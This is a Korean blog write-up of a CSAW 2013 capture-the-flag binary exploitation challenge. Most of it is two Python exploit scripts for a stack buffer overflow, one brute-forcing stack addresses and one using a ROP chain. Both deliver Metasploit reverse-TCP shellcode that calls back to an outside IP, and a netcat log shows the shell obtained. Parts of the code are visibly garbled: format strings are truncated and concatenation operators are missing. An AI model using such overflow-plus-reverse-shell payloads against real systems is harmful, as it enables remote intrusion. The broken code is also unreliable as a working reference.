sweetchip's blog


왜 이문제를 헤맷는지 모르겟지만.


어쨋든 대회중엔 시간이 하루밖에 안나서 못푼 문제다.


근데 오늘 갑자기 아이디어가 팍 떠오르고 바로 exploit을 시도했다.



fil_chal



Aslr : Off (fork())

NX : Off (execstack : X)


from struct import pack, unpack

import time


p = lambda x : pack("

up = lambda x : unpack("


HOST = "128.238.66.217"

HOST = "192.168.242.129"

PORT = 34266


offset = 0x41c


# linux/x86/shell_reverse_tcp - 95 bytes

# http://www.metasploit.com

# Encoder: x86/shikata_ga_nai

# VERBOSE=false, LHOST=220.117.247.200, LPORT=12071,

# ReverseConnectRetries=5, ReverseAllowProxy=false,

# PrependSetresuid=false, PrependSetreuid=false,

# PrependSetuid=false, PrependSetresgid=false,

# PrependSetregid=false, PrependSetgid=false,

# PrependChrootBreak=false, AppendExit=false,

# InitialAutoRunScript=, AutoRunScript=

shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"

"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"

"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"

"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"

"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"

"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"

"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")




def exploit(addr):

exploit = "\x90" * 0x384

exploit = shellcode

exploit = "\x90" * (offset - len(exploit))

exploit = p(addr) * 2# eip

return exploit


print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip

print "[*] Start BroutFore."

for i in range(0xbf879000, 0xbf000000, -0x200):

s = socket(AF_INET,SOCK_STREAM)

s.connect((HOST,PORT))


print hex(i)


s.recv(4096)

s.recv(4096)

s.send("csaw2013") # trig bof

s.recv(4096)

s.send("S1mplePWD")

s.recv(4096)

s.send("-1")

s.send(exploit(i))



raw_input("\ngive me shell! > ")


브루트 포싱으로 쉘을 따는건데 약간 느려서 주소를 설정해서 작성햇다.


대회시간대가 아니라 csaw 서버에서 못풀고 로컬에서 풀엇다 ㅠㅠ



///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////


http://pastebin.com/1Uchkd6E


새로운 풀이


from struct import pack, unpack

from socket import *

import time


p = lambda x : pack("

up = lambda x : unpack("


HOST = "192.168.0.109"

PORT = 34266


# linux/x86/shell_reverse_tcp - 95 bytes

# http://www.metasploit.com

shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"

"\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"

"\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"

"\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"

"\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"

"\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"

"\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")


freespace = 0x0804b000 # rwx

recv = 0x08048890

pr = 0x08048943

offset = 0x41c


print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip

s = socket(AF_INET,SOCK_STREAM)

s.connect((HOST,PORT))


print s.recv(4096)

print s.recv(4096)

s.send("csaw2013")


print s.recv(4096)

s.send("S1mplePWD")


print s.recv(4096)

s.send("-1")


print s.recv(4096)

time.sleep(1)



payload = "A"*(0x41c 4) # ebp

payload = p(recv) # rop_start

payload = p(pr)

payload = p(4)

payload = p(freespace)

payload = p(len(shellcode))

payload = p(0)


s.send(payload)

s.send(shellcode)

raw_input("\ngive me shell! > ")


"""

C:\Users\Administrator>nc -lvp 12071

listening on [any] 12071 ...

192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA

connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA

whoami

sweetchip

"""





신고

댓글 0